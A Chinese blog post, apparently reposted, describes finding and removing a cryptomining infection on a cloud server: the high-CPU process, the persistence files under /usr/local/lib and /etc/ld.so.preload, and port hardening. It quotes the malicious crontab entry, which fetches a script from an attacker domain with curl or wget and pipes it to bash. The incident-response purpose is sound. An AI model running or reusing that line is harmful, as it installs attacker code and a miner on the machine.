最近这个挖矿病毒又出现了。。。不知道为啥,公司买的服务器老是出现这样的问题,以前别的公司都没有这种情况
以下是原文章:
公司一直用的阿里云服务器进行生产环境的部署,但是最近某一台服务器上的CPU使用率一直高达95%以上,经过排查项目和代码、定时脚本等,都未发现问题根源,但是有一个文件的占用很高
排查:查看CPU占用率
- 在服务器上使用命令:
top -c查看进程运行的信息列表 - 再按下大写的:
P使进程按照CPU使用率排序
类似下图(这里只做演示,非实际情况):
然后可以看到 /usr/local/lib/.libs 占用cpu过高
再接着就是杀进程(这里要排除不是自己的项目所涉及到的)
但是每次杀完之后,CPU就降了下去,过一会就又开始升上来,这时候就可以想到是定时器的问题,使用命令:crontab -l 查看定时任务,发现如下代码:
30 23 * * * (curl -s http://w.apacheorg.top:1234/xmss||wget -q -O - http://w.apacheorg.top:1234/xmss )|bash -sh
好家伙,这是一直在下载某个东西。。。这意味的这台机器变成了挖矿的肉机
解决:
- 1.先干定时器,执行crontab -e,删掉对应的命令,再查/etc/cron.d/,/var/spool/cron/,/etc/cron.hourly/oanacroner1, /var/spool/cron/crontabs/下面的文件,全删(当然如果有自己项目的定时命令,自己注意分辨)。
- 2.再干/etc/ld.so.preload,发觉删不掉?执行下命令:
chattr -ai /etc/ld.so.preload,再删除 - 3.再干/usr/local/lib/的.inis,.inid,.libd,.libs(可以打开文件确认下),删不掉,再使用上一步的命令(
chattr -ai 文件) - 4.限制云服务器的端口、修改账号和密码
原因:
由于最近比特币的疯狂涨势,导致很多人挖矿的加大了病毒的植入。应该是通过全扫描的形式进行云服务器的攻击,所以对外的端口需要进行限制,最好用云服务器的内网端口。